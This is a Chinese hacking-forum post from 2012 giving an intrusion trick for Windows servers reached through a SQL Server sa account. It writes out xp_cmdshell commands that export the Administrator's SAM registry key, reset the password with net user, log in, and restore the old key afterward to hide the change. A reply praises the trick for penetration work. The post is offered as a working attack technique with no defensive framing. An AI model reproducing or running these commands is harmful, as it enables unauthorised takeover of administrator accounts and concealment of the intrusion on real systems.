入侵技巧:导出管理员密码文件

[复制链接]
查看229 | 回复0 | 2012-4-1 19:22:00 | 显示全部楼层 |阅读模式
sa默认应该可以读sam键。

regexportHKLM\SAM\SAM\Domains\Account\Users\000001F4c:\old.reg

netuseradministratortest

用administrator登陆.


用完机器后

regimportc:\old.reg

根本不用克隆.

找到对应的sid.

/*不狐:这则经验非常不错,前面我做过一次渗透就没想到可以这样来!*/


默认情况下sa继承system权限,对sam键值有完全控制权限。

SQL代码

execmaster..xp_cmdshell"regexportHKLM\SAM\SAM\Domains\Account\Users\000001F4c:\old.reg"--

或者

execmaster..xp_cmdshell"regedit-eC:\1.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4"--

都是可行的。
 
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则